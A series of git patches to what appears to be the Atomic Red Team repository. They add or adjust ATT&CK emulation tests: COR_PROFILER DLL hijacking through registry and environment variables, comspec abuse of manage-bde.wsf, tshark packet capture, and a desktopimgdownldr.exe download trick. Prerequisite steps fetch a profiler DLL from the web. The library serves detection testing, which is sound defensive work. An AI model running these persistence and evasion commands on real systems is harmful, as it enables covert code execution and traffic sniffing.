+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Registry-free process scope COR_PROFILER
+Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$env:COR_ENABLE_PROFILING = 1
+$env:COR_PROFILER = '#{clsid_guid}'
+$env:COR_PROFILER_PATH = '#{file_name}'
+POWERSHELL -c 'Start-Sleep 1'
+```
+
+#### Cleanup Commands:
+```powershell
+$env:COR_ENABLE_PROFILING = 0
+$env:COR_PROFILER = ''
+$env:COR_PROFILER_PATH = ''
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>

From 55785dfd6a9b19f6e78e6763c57e57973a41ee8d Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Tue, 18 Aug 2020 16:38:09 -0600
Subject: [PATCH 09/19] include full path to manage-bde.wsf

---
 atomics/T1216/T1216.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
index 466c30d5..855b428b 100644
--- a/atomics/T1216/T1216.yaml
+++ b/atomics/T1216/T1216.yaml
@@ -27,12 +27,12 @@ atomic_tests:
     command_to_execute:
       description: A command to execute.
       type: Path
-      default: C:\Windows\System32\calc.exe
+      default: '%windir%\System32\calc.exe'
   executor:
     command: |
       set comspec=#{command_to_execute}
-      cscript manage-bde.wsf
+      cscript %windir%\System32\manage-bde.wsf
     cleanup_command: |
-      set comspec=C:\Windows\System32\cmd.exe
+      set comspec=%windir%\System32\cmd.exe
     name: command_prompt
 

From 232e7e9a0e0e0533bfb8b6bf23383118c8a2da60 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 18 Aug 2020 22:39:29 +0000
Subject: [PATCH 10/19] Generate docs from job=validate_atomics_generate_docs
 branch=clr2of8-patch-6

---
 atomics/Indexes/index.yaml | 6 +++---
 atomics/T1216/T1216.md     | 6 +++---
 2 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a799a220..e9c414e6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -33063,12 +33063,12 @@ defense-evasion:
         command_to_execute:
           description: A command to execute.
           type: Path
-          default: C:\Windows\System32\calc.exe
+          default: "%windir%\\System32\\calc.exe"
       executor:
         command: |
           set comspec=#{command_to_execute}
-          cscript manage-bde.wsf
-        cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
+          cscript %windir%\System32\manage-bde.wsf
+        cleanup_command: 'set comspec=%windir%\System32\cmd.exe
 
 '
         name: command_prompt
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index c2802d6b..c5ac55a8 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -52,7 +52,7 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| command_to_execute | A command to execute. | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
+| command_to_execute | A command to execute. | Path | %windir%&#92;System32&#92;calc.exe|
 
 
 #### Attack Commands: Run with `command_prompt`! 
@@ -60,12 +60,12 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c
 
 ```cmd
 set comspec=#{command_to_execute}
-cscript manage-bde.wsf
+cscript %windir%\System32\manage-bde.wsf
 ```
 
 #### Cleanup Commands:
 ```cmd
-set comspec=C:\Windows\System32\cmd.exe
+set comspec=%windir%\System32\cmd.exe
 ```
 
 

From 496b3e5ebfe426d74da880d94c9811eff14bc670 Mon Sep 17 00:00:00 2001
From: clr2of8 <clr2of8@gmail.com>
Date: Wed, 19 Aug 2020 09:29:26 -0600
Subject: [PATCH 11/19] fix csv link

---
 README.md                                | 2 +-
 atomics/Indexes/Indexes-Markdown/tmp.txt | 0
 atomics/Indexes/Matrices/tmp.txt         | 0
 3 files changed, 1 insertion(+), 1 deletion(-)
 delete mode 100644 atomics/Indexes/Indexes-Markdown/tmp.txt
 delete mode 100644 atomics/Indexes/Matrices/tmp.txt

diff --git a/README.md b/README.md
index 3b79cc8a..51788ec0 100644
--- a/README.md
+++ b/README.md
@@ -40,7 +40,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
 
 * [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
 * Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index-by-tactic.md)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
+* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
   - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
   - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
   - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
diff --git a/atomics/Indexes/Indexes-Markdown/tmp.txt b/atomics/Indexes/Indexes-Markdown/tmp.txt
deleted file mode 100644
index e69de29b..00000000
diff --git a/atomics/Indexes/Matrices/tmp.txt b/atomics/Indexes/Matrices/tmp.txt
deleted file mode 100644
index e69de29b..00000000

From ee7deb22fd2ac8a4968d002c629b73abd58aff3a Mon Sep 17 00:00:00 2001
From: bbucao <57825239+bbucao@users.noreply.github.com>
Date: Thu, 20 Aug 2020 15:21:07 -0500
Subject: [PATCH 12/19] Update to T1040.yaml test 3 "Packet capture windows
 command prompt" (#1208)

---
 atomics/T1040/T1040.yaml | 24 ++++++++++++++++++++----
 1 file changed, 20 insertions(+), 4 deletions(-)

diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml
index ba0df937..9105fe8b 100644
--- a/atomics/T1040/T1040.yaml
+++ b/atomics/T1040/T1040.yaml
@@ -59,20 +59,36 @@ atomic_tests:
   auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
   description: |
     Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-    installed, along with WinPCAP. Windump will require the windump executable.
+    installed.
 
-    Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+    Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
   supported_platforms:
   - windows
   input_arguments:
     interface:
       description: Specify interface to perform PCAP on.
       type: String
-      default: Ethernet0
+      default: Ethernet
+    wireshark_url:
+      description: wireshark installer download URL
+      type: url
+      default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+    tshark_path:
+      description: path to tshark.exe 
+      type: path
+      default: c:\program files\wireshark\tshark.exe
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+       tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
+      prereq_command:
+        if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+        Start-Process $env:temp\wireshark_installer.exe /S
   executor:
     command: |
       "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-      c:\windump.exe
     name: command_prompt
     elevation_required: true
     

From 7e5f711d57412e46b4abfece70056458cbd16483 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 20 Aug 2020 20:21:38 +0000
Subject: [PATCH 13/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/index.yaml | 60 ++++++++++++++++++++++++++++++--------
 atomics/T1040/T1040.md     | 22 +++++++++++---
 2 files changed, 66 insertions(+), 16 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e9c414e6..7f7a293a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -19353,20 +19353,38 @@ credential-access:
       auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
       description: |
         Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-        installed, along with WinPCAP. Windump will require the windump executable.
+        installed.
 
-        Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+        Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
       supported_platforms:
       - windows
       input_arguments:
         interface:
           description: Specify interface to perform PCAP on.
           type: String
-          default: Ethernet0
+          default: Ethernet
+        wireshark_url:
+          description: wireshark installer download URL
+          type: url
+          default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+        tshark_path:
+          description: path to tshark.exe
+          type: path
+          default: c:\program files\wireshark\tshark.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'tshark must be installed and in the default path of "c:\Program
+          Files\Wireshark\Tshark.exe".
+
+'
+        prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+          Start-Process $env:temp\wireshark_installer.exe /S
       executor:
-        command: |
-          "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-          c:\windump.exe
+        command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
+
+'
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
@@ -39188,20 +39206,38 @@ discovery:
       auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
       description: |
         Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-        installed, along with WinPCAP. Windump will require the windump executable.
+        installed.
 
-        Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+        Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
       supported_platforms:
       - windows
       input_arguments:
         interface:
           description: Specify interface to perform PCAP on.
           type: String
-          default: Ethernet0
+          default: Ethernet
+        wireshark_url:
+          description: wireshark installer download URL
+          type: url
+          default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+        tshark_path:
+          description: path to tshark.exe
+          type: path
+          default: c:\program files\wireshark\tshark.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'tshark must be installed and in the default path of "c:\Program
+          Files\Wireshark\Tshark.exe".
+
+'
+        prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+          Start-Process $env:temp\wireshark_installer.exe /S
       executor:
-        command: |
-          "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-          c:\windump.exe
+        command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
+
+'
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md
index e41c7a1c..09551825 100644
--- a/atomics/T1040/T1040.md
+++ b/atomics/T1040/T1040.md
@@ -109,9 +109,9 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
 
 ## Atomic Test #3 - Packet Capture Windows Command Prompt
 Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-installed, along with WinPCAP. Windump will require the windump executable.
+installed.
 
-Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
 
 **Supported Platforms:** Windows
 
@@ -121,7 +121,9 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | Ethernet0|
+| interface | Specify interface to perform PCAP on. | String | Ethernet|
+| wireshark_url | wireshark installer download URL | url | https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe|
+| tshark_path | path to tshark.exe | path | c:&#92;program files&#92;wireshark&#92;tshark.exe|
 
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -129,12 +131,24 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 
 ```cmd
 "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-c:\windump.exe
 ```
 
 
 
 
+#### Dependencies:  Run with `powershell`!
+##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{tshark_path}") {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+Start-Process $env:temp\wireshark_installer.exe /S
+```
+
+
 
 
 <br/>

From c8be2137d7079688c40166caa235ab3b13075731 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Thu, 20 Aug 2020 15:27:09 -0500
Subject: [PATCH 14/19] T1197 desktopimgdwnldr.exe (#1206)

* Update T1197.yaml

desktopimgdownldr.exe initial commit

* Update T1197.yaml

fixed parsing issue with command

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1197/T1197.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)

diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index 9db84377..86e316cf 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -82,3 +82,34 @@ atomic_tests:
     cleanup_command: |
       del #{local_file} >nul 2>&1
     name: command_prompt
+- name: Bits download using destktopimgdownldr.exe (cmd)
+  description: |
+    This test simulates using destopimgdwnldr.exe to download a malicious file
+    instead of a desktop or lockscreen background img. The process that actually makes 
+    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
+    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    download_path:
+      description: Local file path to save downloaded file
+      type: path
+      default: 'SYSTEMROOT=C:\Windows\Temp'
+    cleanup_path:
+      description: path to delete file as part of cleanup_command
+      type: path
+      default: C:\Windows\Temp\Personalization\LockScreenImage
+    cleanup_file:
+      description: file to remove as part of cleanup_command
+      type: string
+      default: "*.md"
+  executor:
+    command: |
+      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
+    cleanup_command: |
+      del #{cleanup_path}\#{cleanup_file}
+    name: command_prompt

From 84054abce5a3e88a790a7256e727948d65e749b4 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 20 Aug 2020 20:28:30 +0000
Subject: [PATCH 15/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv         |  2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  2 +
 atomics/Indexes/Indexes-Markdown/index.md     |  2 +
 .../Indexes/Indexes-Markdown/windows-index.md |  2 +
 atomics/Indexes/index.yaml                    | 70 +++++++++++++++++++
 atomics/T1197/T1197.md                        | 41 +++++++++++
 atomics/T1197/T1197.yaml                      |  1 +
 atomics/used_guids.txt                        |  1 +
 8 files changed, 121 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index bd7593db..263328c3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -92,6 +92,7 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -211,6 +212,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e04b500f..96b07c16 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -56,6 +56,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -206,6 +207,7 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 65d973af..04048f47 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -196,6 +196,7 @@
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -453,6 +454,7 @@
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 63b7389c..9cebd745 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -126,6 +126,7 @@
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
@@ -394,6 +395,7 @@
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 7f7a293a..52dc0d30 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -9487,6 +9487,41 @@ persistence:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
+'
+        name: command_prompt
+    - name: Bits download using destktopimgdownldr.exe (cmd)
+      auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
+      description: "This test simulates using destopimgdwnldr.exe to download a malicious
+        file\ninstead of a desktop or lockscreen background img. The process that
+        actually makes \nthe TCP connection and creates the file on the disk is a
+        svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe.
+        See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: Remote file to download
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+        download_path:
+          description: Local file path to save downloaded file
+          type: path
+          default: SYSTEMROOT=C:\Windows\Temp
+        cleanup_path:
+          description: path to delete file as part of cleanup_command
+          type: path
+          default: C:\Windows\Temp\Personalization\LockScreenImage
+        cleanup_file:
+          description: file to remove as part of cleanup_command
+          type: string
+          default: "*.md"
+      executor:
+        command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
+          /eventName:desktopimgdownldr
+
+'
+        cleanup_command: 'del #{cleanup_path}\#{cleanup_file}
+
 '
         name: command_prompt
   T1547:
@@ -21438,6 +21473,41 @@ defense-evasion:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
+'
+        name: command_prompt
+    - name: Bits download using destktopimgdownldr.exe (cmd)
+      auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
+      description: "This test simulates using destopimgdwnldr.exe to download a malicious
+        file\ninstead of a desktop or lockscreen background img. The process that
+        actually makes \nthe TCP connection and creates the file on the disk is a
+        svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe.
+        See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: Remote file to download
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+        download_path:
+          description: Local file path to save downloaded file
+          type: path
+          default: SYSTEMROOT=C:\Windows\Temp
+        cleanup_path:
+          description: path to delete file as part of cleanup_command
+          type: path
+          default: C:\Windows\Temp\Personalization\LockScreenImage
+        cleanup_file:
+          description: file to remove as part of cleanup_command
+          type: string
+          default: "*.md"
+      executor:
+        command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
+          /eventName:desktopimgdownldr
+
+'
+        cleanup_command: 'del #{cleanup_path}\#{cleanup_file}
+
 '
         name: command_prompt
   T1027.001:
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index 5c9b581e..59323363 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -16,6 +16,8 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
 
 - [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute)
 
+- [Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-destktopimgdownldrexe-cmd)
+
 
 <br/>
 
@@ -130,4 +132,43 @@ del #{local_file} >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)
+This test simulates using destopimgdwnldr.exe to download a malicious file
+instead of a desktop or lockscreen background img. The process that actually makes 
